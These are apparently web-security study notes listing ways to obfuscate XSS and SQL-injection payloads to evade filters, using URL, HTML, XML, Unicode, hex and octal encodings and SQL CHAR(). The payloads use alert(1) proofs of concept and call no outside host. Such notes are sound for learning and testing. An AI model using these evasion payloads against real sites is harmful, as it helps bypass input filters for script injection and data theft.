Obfuscation

URL encoding:

[...]/?search=Fish+%26+Chips

Double URL encoding:

[...]/?search=%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E
[...]/?search=%253Cimg%2520src%253Dx%2520onerror%253Dalert(1)%253E

HTML encoding:

<img src=x onerror="&#x61;lert(1)">
<a href="javascript&#00000000000058;alert(1)">Click me</a>

XML encoding:

<stockCheck>
    <productId>
        123
    </productId>
    <storeId>
        999 &#x53;ELECT * FROM information_schema.tables
    </storeId>
</stockCheck>

Unicode encoding:

eval("\u0061lert(1)")
<a href="javascript\u{0000000003a}alert(1)">Click me</a>

Hex escaping:

eval("\x61lert")

Octal escaping:

eval("\141lert(1)")

Multiple encodings:

<a href="javascript:&bsol;u0061lert(1)">Click me</a>

Browser will first HTML decode \ to \ - turning u0061 into the unicode escape \u0061 decoding into a.

SQL char() function:

CHAR(83)+CHAR(69)+CHAR(76)+CHAR(69)+CHAR(67)+CHAR(84)

Decoded to SELECT